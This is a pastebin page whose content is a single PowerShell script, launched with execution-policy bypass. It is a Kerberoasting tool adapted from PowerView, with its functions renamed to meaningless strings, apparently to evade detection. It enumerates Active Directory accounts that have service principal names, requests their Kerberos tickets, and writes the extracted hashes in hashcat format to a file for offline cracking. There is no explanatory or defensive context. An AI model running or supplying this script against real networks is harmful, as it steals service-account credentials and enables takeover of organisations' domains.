Cadastrar
Login
Novo texto
Página Inicial
Trending
Arquivo
Português
English
Português
Cadastrar
Login
Novo Texto
Importar Arquivo
powershell -ep bypass function kjefhkajdfkj { [Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSShouldProcess', '')] [OutputType('System.DirectoryServices.DirectorySearcher')] [CmdletBinding()] Param( [Parameter(ValueFromPipeline = $True)] [ValidateNotNullOrEmpty()] [String] $Domain, [ValidateNotNullOrEmpty()] [Alias('Filter')] [String] $LDAPFilter, [ValidateNotNullOrEmpty()] [String[]] $Properties, [ValidateNotNullOrEmpty()] [Alias('ADSPath')] [String] $SearchBase, [ValidateNotNullOrEmpty()] [String] $SearchBasePrefix, [ValidateNotNullOrEmpty()] [Alias('DomainController')] [String] $Server, [ValidateSet('Base', 'OneLevel', 'Subtree')] [String] $SearchScope = 'Subtree', [ValidateRange(1, 10000)] [Int] $ResultPageSize = 200, [ValidateRange(1, 10000)] [Int] $ServerTimeLimit = 120, [ValidateSet('Dacl', 'Group', 'None', 'Owner', 'Sacl')] [String] $SecurityMasks, [Switch] $Tombstone, [Management.Automation.PSCredential] [Management.Automation.CredentialAttribute()] $Credential = [Management.Automation.PSCredential]::Empty ) PROCESS { if ($PSBoundParameters['Domain']) { $TargetDomain = $Domain } else { # if not -Domain is specified, retrieve the current domain name if ($PSBoundParameters['Credential']) { $DomainObject = ewrewrn -Credential $Credential } else { $DomainObject = ewrewrn } $TargetDomain = $DomainObject.Name } if (-not $PSBoundParameters['Server']) { # if there's not a specified server to bind to, try to pull the current domain PDC try { if ($DomainObject) { $BindServer = $DomainObject.PdcRoleOwner.Name } elseif ($PSBoundParameters['Credential']) { $BindServer = ((ewrewrn -Credential $Credential).PdcRoleOwner).Name } else { $BindServer = ((ewrewrn).PdcRoleOwner).Name } } catch { throw "[kjefhkajdfkj] Error in retrieving PDC for current domain: $_" } } else { $BindServer = $Server } $SearchString = 'LDAP://' if ($BindServer -and ($BindServer.Trim() -ne '')) { $SearchString += $BindServer if ($TargetDomain) { $SearchString += '/' } } if ($PSBoundParameters['SearchBasePrefix']) { $SearchString += $SearchBasePrefix + ',' } if ($PSBoundParameters['SearchBase']) { if ($SearchBase -Match '^GC://') { # if we're searching the global catalog, get the path in the right format $DN = $SearchBase.ToUpper().Trim('/') $SearchString = '' } else { if ($SearchBase -match '^LDAP://') { if ($SearchBase -match "LDAP://.+/.+") { $SearchString = '' $DN = $SearchBase } else { $DN = $SearchBase.SubString(7) } } else { $DN = $SearchBase } } } else { # transform the target domain name into a distinguishedName if an ADS search base is not specified if ($TargetDomain -and ($TargetDomain.Trim() -ne '')) { $DN = "DC=$($TargetDomain.Replace('.', ',DC='))" } } $SearchString += $DN Write-Verbose "[kjefhkajdfkj] search string: $SearchString" if ($Credential -ne [Management.Automation.PSCredential]::Empty) { Write-Verbose "[kjefhkajdfkj] Using alternate credentials for LDAP connection" # bind to the inital search object using alternate credentials $DomainObject = New-Object DirectoryServices.DirectoryEntry($SearchString, $Credential.UserName, $Credential.GetNetworkCredential().Password) $Searcher = New-Object System.DirectoryServices.DirectorySearcher($DomainObject) } else { # bind to the inital object using the current credentials $Searcher = New-Object System.DirectoryServices.DirectorySearcher([ADSI]$SearchString) } $Searcher.PageSize = $ResultPageSize $Searcher.SearchScope = $SearchScope $Searcher.CacheResults = $False $Searcher.ReferralChasing = [System.DirectoryServices.ReferralChasingOption]::All if ($PSBoundParameters['ServerTimeLimit']) { $Searcher.ServerTimeLimit = $ServerTimeLimit } if ($PSBoundParameters['Tombstone']) { $Searcher.Tombstone = $True } if ($PSBoundParameters['LDAPFilter']) { $Searcher.filter = $LDAPFilter } if ($PSBoundParameters['SecurityMasks']) { $Searcher.SecurityMasks = Switch ($SecurityMasks) { 'Dacl' { [System.DirectoryServices.SecurityMasks]::Dacl } 'Group' { [System.DirectoryServices.SecurityMasks]::Group } 'None' { [System.DirectoryServices.SecurityMasks]::None } 'Owner' { [System.DirectoryServices.SecurityMasks]::Owner } 'Sacl' { [System.DirectoryServices.SecurityMasks]::Sacl } } } if ($PSBoundParameters['Properties']) { # handle an array of properties to load w/ the possibility of comma-separated strings $PropertiesToLoad = $Properties| ForEach-Object { $_.Split(',') } $Null = $Searcher.PropertiesToLoad.AddRange(($PropertiesToLoad)) } $Searcher } } function fdsfdsfs { [Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSShouldProcess', '')] [OutputType('System.Management.Automation.PSCustomObject')] [CmdletBinding()] Param( [Parameter(Mandatory = $True, ValueFromPipeline = $True)] [ValidateNotNullOrEmpty()] $Properties ) $ObjectProperties = @{} $Properties.PropertyNames | ForEach-Object { if ($_ -ne 'adspath') { if (($_ -eq 'objectsid') -or ($_ -eq 'sidhistory')) { # convert all listed sids (i.e. if multiple are listed in sidHistory) $ObjectProperties[$_] = $Properties[$_] | ForEach-Object { (New-Object System.Security.Principal.SecurityIdentifier($_, 0)).Value } } elseif ($_ -eq 'grouptype') { $ObjectProperties[$_] = $Properties[$_][0] -as $GroupTypeEnum } elseif ($_ -eq 'samaccounttype') { $ObjectProperties[$_] = $Properties[$_][0] -as $SamAccountTypeEnum } elseif ($_ -eq 'objectguid') { # convert the GUID to a string $ObjectProperties[$_] = (New-Object Guid (,$Properties[$_][0])).Guid } elseif ($_ -eq 'useraccountcontrol') { $ObjectProperties[$_] = $Properties[$_][0] -as $UACEnum } elseif ($_ -eq 'ntsecuritydescriptor') { # $ObjectProperties[$_] = New-Object Security.AccessControl.RawSecurityDescriptor -ArgumentList $Properties[$_][0], 0 $Descriptor = New-Object Security.AccessControl.RawSecurityDescriptor -ArgumentList $Properties[$_][0], 0 if ($Descriptor.Owner) { $ObjectProperties['Owner'] = $Descriptor.Owner } if ($Descriptor.Group) { $ObjectProperties['Group'] = $Descriptor.Group } if ($Descriptor.DiscretionaryAcl) { $ObjectProperties['DiscretionaryAcl'] = $Descriptor.DiscretionaryAcl } if ($Descriptor.SystemAcl) { $ObjectProperties['SystemAcl'] = $Descriptor.SystemAcl } } elseif ($_ -eq 'accountexpires') { if ($Properties[$_][0] -gt [DateTime]::MaxValue.Ticks) { $ObjectProperties[$_] = "NEVER" } else { $ObjectProperties[$_] = [datetime]::fromfiletime($Properties[$_][0]) } } elseif ( ($_ -eq 'lastlogon') -or ($_ -eq 'lastlogontimestamp') -or ($_ -eq 'pwdlastset') -or ($_ -eq 'lastlogoff') -or ($_ -eq 'badPasswordTime') ) { # convert timestamps if ($Properties[$_][0] -is [System.MarshalByRefObject]) { # if we have a System.__ComObject $Temp = $Properties[$_][0] [Int32]$High = $Temp.GetType().InvokeMember('HighPart', [System.Reflection.BindingFlags]::GetProperty, $Null, $Temp, $Null) [Int32]$Low = $Temp.GetType().InvokeMember('LowPart', [System.Reflection.BindingFlags]::GetProperty, $Null, $Temp, $Null) $ObjectProperties[$_] = ([datetime]::FromFileTime([Int64]("0x{0:x8}{1:x8}" -f $High, $Low))) } else { # otherwise just a string $ObjectProperties[$_] = ([datetime]::FromFileTime(($Properties[$_][0]))) } } elseif ($Properties[$_][0] -is [System.MarshalByRefObject]) { # try to convert misc com objects $Prop = $Properties[$_] try { $Temp = $Prop[$_][0] [Int32]$High = $Temp.GetType().InvokeMember('HighPart', [System.Reflection.BindingFlags]::GetProperty, $Null, $Temp, $Null) [Int32]$Low = $Temp.GetType().InvokeMember('LowPart', [System.Reflection.BindingFlags]::GetProperty, $Null, $Temp, $Null) $ObjectProperties[$_] = [Int64]("0x{0:x8}{1:x8}" -f $High, $Low) } catch { Write-Verbose "[fdsfdsfs] error: $_" $ObjectProperties[$_] = $Prop[$_] } } elseif ($Properties[$_].count -eq 1) { $ObjectProperties[$_] = $Properties[$_][0] } else { $ObjectProperties[$_] = $Properties[$_] } } } try { New-Object -TypeName PSObject -Property $ObjectProperties } catch { Write-Warning "[fdsfdsfs] Error parsing LDAP properties : $_" } } function ewrewrn { [OutputType([System.DirectoryServices.ActiveDirectory.Domain])] [CmdletBinding()] Param( [Parameter(Position = 0, ValueFromPipeline = $True)] [ValidateNotNullOrEmpty()] [String] $Domain, [Management.Automation.PSCredential] [Management.Automation.CredentialAttribute()] $Credential = [Management.Automation.PSCredential]::Empty ) PROCESS { if ($PSBoundParameters['Credential']) { Write-Verbose '[ewrewrn] Using alternate credentials for ewrewrn' if ($PSBoundParameters['Domain']) { $TargetDomain = $Domain } else { # if no domain is supplied, extract the logon domain from the PSCredential passed $TargetDomain = $Credential.GetNetworkCredential().Domain Write-Verbose "[ewrewrn] Extracted domain '$TargetDomain' from -Credential" } $DomainContext = New-Object System.DirectoryServices.ActiveDirectory.DirectoryContext('Domain', $TargetDomain, $Credential.UserName, $Credential.GetNetworkCredential().Password) try { [System.DirectoryServices.ActiveDirectory.Domain]::GetDomain($DomainContext) } catch { Write-Verbose "[ewrewrn] The specified domain '$TargetDomain' does not exist, could not be contacted, there isn't an existing trust, or the specified credentials are invalid: $_" } } elseif ($PSBoundParameters['Domain']) { $DomainContext = New-Object System.DirectoryServices.ActiveDirectory.DirectoryContext('Domain', $Domain) try { [System.DirectoryServices.ActiveDirectory.Domain]::GetDomain($DomainContext) } catch { Write-Verbose "[ewrewrn] The specified domain '$Domain' does not exist, could not be contacted, or there isn't an existing trust : $_" } } else { try { [System.DirectoryServices.ActiveDirectory.Domain]::GetCurrentDomain() } catch { Write-Verbose "[ewrewrn] Error retrieving the current domain: $_" } } } } function dgdsgfsdf { [OutputType('PowerView.SPNTicket')] [CmdletBinding(DefaultParameterSetName = 'RawSPN')] Param ( [Parameter(Position = 0, ParameterSetName = 'RawSPN', Mandatory = $True, ValueFromPipeline = $True)] [ValidatePattern('.*/.*')] [Alias('ServicePrincipalName')] [String[]] $SPN, [Parameter(Position = 0, ParameterSetName = 'User', Mandatory = $True, ValueFromPipeline = $True)] [ValidateScript({ $_.PSObject.TypeNames[0] -eq 'PowerView.User' })] [Object[]] $User, [ValidateSet('NXB', 'Hashcat')] [Alias('Format')] [String] $OutputFormat = 'NXB', [ValidateRange(0,10000)] [Int] $Delay = 0, [ValidateRange(0.0, 1.0)] [Double] $Jitter = .3, [Management.Automation.PSCredential] [Management.Automation.CredentialAttribute()] $Credential = [Management.Automation.PSCredential]::Empty ) BEGIN { $Null = [Reflection.Assembly]::LoadWithPartialName('System.IdentityModel') if ($PSBoundParameters['Credential']) { $LogonToken = Invoke-UserImpersonation -Credential $Credential } } PROCESS { if ($PSBoundParameters['User']) { $TargetObject = $User } else { $TargetObject = $SPN } $RandNo = New-Object System.Random ForEach ($Object in $TargetObject) { if ($PSBoundParameters['User']) { $UserSPN = $Object.ServicePrincipalName $SamAccountName = $Object.SamAccountName $DistinguishedName = $Object.DistinguishedName } else { $UserSPN = $Object $SamAccountName = 'UNKNOWN' $DistinguishedName = 'UNKNOWN' } if ($UserSPN -is [System.DirectoryServices.ResultPropertyValueCollection]) { $UserSPN = $UserSPN[0] } try { $Ticket = New-Object System.IdentityModel.Tokens.KerberosRequestorSecurityToken -ArgumentList $UserSPN } catch { Write-Warning "[dgdsgfsdf] Error requesting ticket for SPN '$UserSPN' from user '$DistinguishedName': $_" } if ($Ticket) { $TicketByteStream = $Ticket.GetRequest() } if ($TicketByteStream) { $Out = New-Object PSObject $TicketHexStream = [System.BitConverter]::ToString($TicketByteStream) -replace '-' if($TicketHexStream -match 'a382....3082....A0030201(?<EtypeLen>..)A1.{1,4}.......A282(?<CipherTextLen>....)........(?<DataToEnd>.+)') { $Etype = [Convert]::ToByte( $Matches.EtypeLen, 16 ) $CipherTextLen = [Convert]::ToUInt32($Matches.CipherTextLen, 16)-4 $CipherText = $Matches.DataToEnd.Substring(0,$CipherTextLen*2) # Make sure the next field matches the beginning of the KRB_AP_REQ.Authenticator object if($Matches.DataToEnd.Substring($CipherTextLen*2, 4) -ne 'A482') { Write-Warning 'Error parsing ciphertext for the SPN $($Ticket.ServicePrincipalName). Use the TicketByteHexStream field and extract the hash offline with Get-KerberoastHashFromAPReq"' $Hash = $null $Out | Add-Member Noteproperty 'TicketByteHexStream' ([Bitconverter]::ToString($TicketByteStream).Replace('-','')) } else { $Hash = "$($CipherText.Substring(0,32))`$$($CipherText.Substring(32))" $Out | Add-Member Noteproperty 'TicketByteHexStream' $null } } else { Write-Warning "Unable to parse ticket structure for the SPN $($Ticket.ServicePrincipalName). Use the TicketByteHexStream field and extract the hash offline with Get-KerberoastHashFromAPReq" $Hash = $null $Out | Add-Member Noteproperty 'TicketByteHexStream' ([Bitconverter]::ToString($TicketByteStream).Replace('-','')) } if($Hash) { if ($OutputFormat -match 'NXB') { $HashFormat = "`$krb5tgs`$$($Ticket.ServicePrincipalName):$Hash" } else { if ($DistinguishedName -ne 'UNKNOWN') { $UserDomain = $DistinguishedName.SubString($DistinguishedName.IndexOf('DC=')) -replace 'DC=','' -replace ',','.' } else { $UserDomain = 'UNKNOWN' } # hashcat output format $HashFormat = "`$krb5tgs`$$($Etype)`$*$SamAccountName`$$UserDomain`$$($Ticket.ServicePrincipalName)*`$$Hash" } $Out | Add-Member Noteproperty 'Hash' $HashFormat } $Out | Add-Member Noteproperty 'SamAccountName' $SamAccountName $Out | Add-Member Noteproperty 'DistinguishedName' $DistinguishedName $Out | Add-Member Noteproperty 'ServicePrincipalName' $Ticket.ServicePrincipalName $Out.PSObject.TypeNames.Insert(0, 'PowerView.SPNTicket') Write-Output $Out } # sleep for our semi-randomized interval Start-Sleep -Seconds $RandNo.Next((1-$Jitter)*$Delay, (1+$Jitter)*$Delay) } } END { if ($LogonToken) { Invoke-RevertToSelf -TokenHandle $LogonToken } } } function ewrewrnUser { [Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSUseDeclaredVarsMoreThanAssignments', '')] [Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSShouldProcess', '')] [OutputType('PowerView.User')] [OutputType('PowerView.User.Raw')] [CmdletBinding(DefaultParameterSetName = 'AllowDelegation')] Param( [Parameter(Position = 0, ValueFromPipeline = $True, ValueFromPipelineByPropertyName = $True)] [Alias('DistinguishedName', 'SamAccountName', 'Name', 'MemberDistinguishedName', 'MemberName')] [String[]] $Identity, [Switch] $SPN, [Switch] $AdminCount, [Parameter(ParameterSetName = 'AllowDelegation')] [Switch] $AllowDelegation, [Parameter(ParameterSetName = 'DisallowDelegation')] [Switch] $DisallowDelegation, [Switch] $TrustedToAuth, [Alias('KerberosPreauthNotRequired', 'NoPreauth')] [Switch] $PreauthNotRequired, [ValidateNotNullOrEmpty()] [String] $Domain, [ValidateNotNullOrEmpty()] [Alias('Filter')] [String] $LDAPFilter, [ValidateNotNullOrEmpty()] [String[]] $Properties, [ValidateNotNullOrEmpty()] [Alias('ADSPath')] [String] $SearchBase, [ValidateNotNullOrEmpty()] [Alias('DomainController')] [String] $Server, [ValidateSet('Base', 'OneLevel', 'Subtree')] [String] $SearchScope = 'Subtree', [ValidateRange(1, 10000)] [Int] $ResultPageSize = 200, [ValidateRange(1, 10000)] [Int] $ServerTimeLimit, [ValidateSet('Dacl', 'Group', 'None', 'Owner', 'Sacl')] [String] $SecurityMasks, [Switch] $Tombstone, [Alias('ReturnOne')] [Switch] $FindOne, [Management.Automation.PSCredential] [Management.Automation.CredentialAttribute()] $Credential = [Management.Automation.PSCredential]::Empty, [Switch] $Raw ) BEGIN { $SearcherArguments = @{} if ($PSBoundParameters['Domain']) { $SearcherArguments['Domain'] = $Domain } if ($PSBoundParameters['Properties']) { $SearcherArguments['Properties'] = $Properties } if ($PSBoundParameters['SearchBase']) { $SearcherArguments['SearchBase'] = $SearchBase } if ($PSBoundParameters['Server']) { $SearcherArguments['Server'] = $Server } if ($PSBoundParameters['SearchScope']) { $SearcherArguments['SearchScope'] = $SearchScope } if ($PSBoundParameters['ResultPageSize']) { $SearcherArguments['ResultPageSize'] = $ResultPageSize } if ($PSBoundParameters['ServerTimeLimit']) { $SearcherArguments['ServerTimeLimit'] = $ServerTimeLimit } if ($PSBoundParameters['SecurityMasks']) { $SearcherArguments['SecurityMasks'] = $SecurityMasks } if ($PSBoundParameters['Tombstone']) { $SearcherArguments['Tombstone'] = $Tombstone } if ($PSBoundParameters['Credential']) { $SearcherArguments['Credential'] = $Credential } $UserSearcher = kjefhkajdfkj @SearcherArguments } PROCESS { if ($UserSearcher) { $IdentityFilter = '' $Filter = '' $Identity | Where-Object {$_} | ForEach-Object { $IdentityInstance = $_.Replace('(', '\28').Replace(')', '\29') if ($IdentityInstance -match '^S-1-') { $IdentityFilter += "(objectsid=$IdentityInstance)" } elseif ($IdentityInstance -match '^CN=') { $IdentityFilter += "(distinguishedname=$IdentityInstance)" if ((-not $PSBoundParameters['Domain']) -and (-not $PSBoundParameters['SearchBase'])) { # if a -Domain isn't explicitly set, extract the object domain out of the distinguishedname # and rebuild the domain searcher $IdentityDomain = $IdentityInstance.SubString($IdentityInstance.IndexOf('DC=')) -replace 'DC=','' -replace ',','.' Write-Verbose "[ewrewrnUser] Extracted domain '$IdentityDomain' from '$IdentityInstance'" $SearcherArguments['Domain'] = $IdentityDomain $UserSearcher = kjefhkajdfkj @SearcherArguments if (-not $UserSearcher) { Write-Warning "[ewrewrnUser] Unable to retrieve domain searcher for '$IdentityDomain'" } } } elseif ($IdentityInstance -imatch '^[0-9A-F]{8}-([0-9A-F]{4}-){3}[0-9A-F]{12}$') { $GuidByteString = (([Guid]$IdentityInstance).ToByteArray() | ForEach-Object { '\' + $_.ToString('X2') }) -join '' $IdentityFilter += "(objectguid=$GuidByteString)" } elseif ($IdentityInstance.Contains('\')) { $ConvertedIdentityInstance = $IdentityInstance.Replace('\28', '(').Replace('\29', ')') | Convert-ADName -OutputType Canonical if ($ConvertedIdentityInstance) { $UserDomain = $ConvertedIdentityInstance.SubString(0, $ConvertedIdentityInstance.IndexOf('/')) $UserName = $IdentityInstance.Split('\')[1] $IdentityFilter += "(samAccountName=$UserName)" $SearcherArguments['Domain'] = $UserDomain Write-Verbose "[ewrewrnUser] Extracted domain '$UserDomain' from '$IdentityInstance'" $UserSearcher = kjefhkajdfkj @SearcherArguments } } else { $IdentityFilter += "(samAccountName=$IdentityInstance)" } } if ($IdentityFilter -and ($IdentityFilter.Trim() -ne '') ) { $Filter += "(|$IdentityFilter)" } if ($PSBoundParameters['SPN']) { Write-Verbose '[ewrewrnUser] Searching for non-null service principal names' $Filter += '(servicePrincipalName=*)' } if ($PSBoundParameters['AllowDelegation']) { Write-Verbose '[ewrewrnUser] Searching for users who can be delegated' # negation of "Accounts that are sensitive and not trusted for delegation" $Filter += '(!(userAccountControl:1.2.840.113556.1.4.803:=1048574))' } if ($PSBoundParameters['DisallowDelegation']) { Write-Verbose '[ewrewrnUser] Searching for users who are sensitive and not trusted for delegation' $Filter += '(userAccountControl:1.2.840.113556.1.4.803:=1048574)' } if ($PSBoundParameters['AdminCount']) { Write-Verbose '[ewrewrnUser] Searching for adminCount=1' $Filter += '(admincount=1)' } if ($PSBoundParameters['TrustedToAuth']) { Write-Verbose '[ewrewrnUser] Searching for users that are trusted to authenticate for other principals' $Filter += '(msds-allowedtodelegateto=*)' } if ($PSBoundParameters['PreauthNotRequired']) { Write-Verbose '[ewrewrnUser] Searching for user accounts that do not require kerberos preauthenticate' $Filter += '(userAccountControl:1.2.840.113556.1.4.803:=4194304)' } if ($PSBoundParameters['LDAPFilter']) { Write-Verbose "[ewrewrnUser] Using additional LDAP filter: $LDAPFilter" $Filter += "$LDAPFilter" } # build the LDAP filter for the dynamic UAC filter value $UACFilter | Where-Object {$_} | ForEach-Object { if ($_ -match 'NOT_.*') { $UACField = $_.Substring(4) $UACValue = [Int]($UACEnum::$UACField) $Filter += "(!(userAccountControl:1.2.840.113556.1.4.803:=$UACValue))" } else { $UACValue = [Int]($UACEnum::$_) $Filter += "(userAccountControl:1.2.840.113556.1.4.803:=$UACValue)" } } $UserSearcher.filter = "(&(samAccountType=805306368)$Filter)" Write-Verbose "[ewrewrnUser] filter string: $($UserSearcher.filter)" if ($PSBoundParameters['FindOne']) { $Results = $UserSearcher.FindOne() } else { $Results = $UserSearcher.FindAll() } $Results | Where-Object {$_} | ForEach-Object { if ($PSBoundParameters['Raw']) { # return raw result objects $User = $_ $User.PSObject.TypeNames.Insert(0, 'PowerView.User.Raw') } else { $User = fdsfdsfs -Properties $_.Properties $User.PSObject.TypeNames.Insert(0, 'PowerView.User') } $User } if ($Results) { try { $Results.dispose() } catch { Write-Verbose "[ewrewrnUser] Error disposing of the Results object: $_" } } $UserSearcher.dispose() } } } function ooju { [Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSShouldProcess', '')] [OutputType('PowerView.SPNTicket')] [CmdletBinding()] Param( [Parameter(Position = 0, ValueFromPipeline = $True, ValueFromPipelineByPropertyName = $True)] [Alias('DistinguishedName', 'SamAccountName', 'Name', 'MemberDistinguishedName', 'MemberName')] [String[]] $Identity, [ValidateNotNullOrEmpty()] [String] $Domain, [ValidateNotNullOrEmpty()] [Alias('Filter')] [String] $LDAPFilter, [ValidateNotNullOrEmpty()] [Alias('ADSPath')] [String] $SearchBase, [ValidateNotNullOrEmpty()] [Alias('DomainController')] [String] $Server, [ValidateSet('Base', 'OneLevel', 'Subtree')] [String] $SearchScope = 'Subtree', [ValidateRange(1, 10000)] [Int] $ResultPageSize = 200, [ValidateRange(1, 10000)] [Int] $ServerTimeLimit, [Switch] $Tombstone, [ValidateRange(0,10000)] [Int] $Delay = 0, [ValidateRange(0.0, 1.0)] [Double] $Jitter = .3, [ValidateSet('NXB', 'Hashcat')] [Alias('Format')] [String] $OutputFormat = 'NXB', [Management.Automation.PSCredential] [Management.Automation.CredentialAttribute()] $Credential = [Management.Automation.PSCredential]::Empty ) BEGIN { $UserSearcherArguments = @{ 'SPN' = $True 'Properties' = 'samaccountname,distinguishedname,serviceprincipalname' } if ($PSBoundParameters['Domain']) { $UserSearcherArguments['Domain'] = $Domain } if ($PSBoundParameters['LDAPFilter']) { $UserSearcherArguments['LDAPFilter'] = $LDAPFilter } if ($PSBoundParameters['SearchBase']) { $UserSearcherArguments['SearchBase'] = $SearchBase } if ($PSBoundParameters['Server']) { $UserSearcherArguments['Server'] = $Server } if ($PSBoundParameters['SearchScope']) { $UserSearcherArguments['SearchScope'] = $SearchScope } if ($PSBoundParameters['ResultPageSize']) { $UserSearcherArguments['ResultPageSize'] = $ResultPageSize } if ($PSBoundParameters['ServerTimeLimit']) { $UserSearcherArguments['ServerTimeLimit'] = $ServerTimeLimit } if ($PSBoundParameters['Tombstone']) { $UserSearcherArguments['Tombstone'] = $Tombstone } if ($PSBoundParameters['Credential']) { $UserSearcherArguments['Credential'] = $Credential } if ($PSBoundParameters['Credential']) { $LogonToken = Invoke-UserImpersonation -Credential $Credential } } PROCESS { if ($PSBoundParameters['Identity']) { $UserSearcherArguments['Identity'] = $Identity } ewrewrnUser @UserSearcherArguments | Where-Object {$_.samaccountname -ne 'krbtgt'} | dgdsgfsdf -Delay $Delay -OutputFormat $OutputFormat -Jitter $Jitter } END { if ($LogonToken) { Invoke-RevertToSelf -TokenHandle $LogonToken } } } ooju -OutputFormat hashcat | % { $_.Hash } | Out-File -Encoding ASCII hashes1.txt
Configurações do Texto
Título do Texto :
[Opcional]
Guardar na Pasta :
[Opcional]
Selecionar
Syntax Highlighting :
[Opcional]
Selecionar
Markup
CSS
JavaScript
Bash
C
C#
C++
Java
JSON
Lua
Plaintext
C-like
ABAP
ActionScript
Ada
Apache Configuration
APL
AppleScript
Arduino
ARFF
AsciiDoc
6502 Assembly
ASP.NET (C#)
AutoHotKey
AutoIt
Basic
Batch
Bison
Brainfuck
Bro
CoffeeScript
Clojure
Crystal
Content-Security-Policy
CSS Extras
D
Dart
Diff
Django/Jinja2
Docker
Eiffel
Elixir
Elm
ERB
Erlang
F#
Flow
Fortran
GEDCOM
Gherkin
Git
GLSL
GameMaker Language
Go
GraphQL
Groovy
Haml
Handlebars
Haskell
Haxe
HTTP
HTTP Public-Key-Pins
HTTP Strict-Transport-Security
IchigoJam
Icon
Inform 7
INI
IO
J
Jolie
Julia
Keyman
Kotlin
LaTeX
Less
Liquid
Lisp
LiveScript
LOLCODE
Makefile
Markdown
Markup templating
MATLAB
MEL
Mizar
Monkey
N4JS
NASM
nginx
Nim
Nix
NSIS
Objective-C
OCaml
OpenCL
Oz
PARI/GP
Parser
Pascal
Perl
PHP
PHP Extras
PL/SQL
PowerShell
Processing
Prolog
.properties
Protocol Buffers
Pug
Puppet
Pure
Python
Q (kdb+ database)
Qore
R
React JSX
React TSX
Ren'py
Reason
reST (reStructuredText)
Rip
Roboconf
Ruby
Rust
SAS
Sass (Sass)
Sass (Scss)
Scala
Scheme
Smalltalk
Smarty
SQL
Soy (Closure Template)
Stylus
Swift
TAP
Tcl
Textile
Template Toolkit 2
Twig
TypeScript
VB.Net
Velocity
Verilog
VHDL
vim
Visual Basic
WebAssembly
Wiki markup
Xeora
Xojo (REALbasic)
XQuery
YAML
HTML
Expiração do Texto :
[Opcional]
Nunca
Auto Destruir
10 Minutos
1 Hora
1 Dia
1 Semana
2 Semanas
1 Mês
6 Meses
1 Ano
Status do Texto :
[Opcional]
Público
Não Listado
Privado (somente membros)
Senha :
[Opcional]
Descrição:
[Opcional]
Tags:
[Opcional]
Criptografar Texto
(
?
)
Criar Novo Texto
No momento você não está logado, isso significa que você não pode editar ou excluir nada que você poste.
Cadastre-se
ou faça o
Login
Idiomas do site
×
English
Português
Você gosta de cookies?
🍪 Usamos cookies para garantir que você obtenha a melhor experiência em nosso site.
Saber mais
Concordo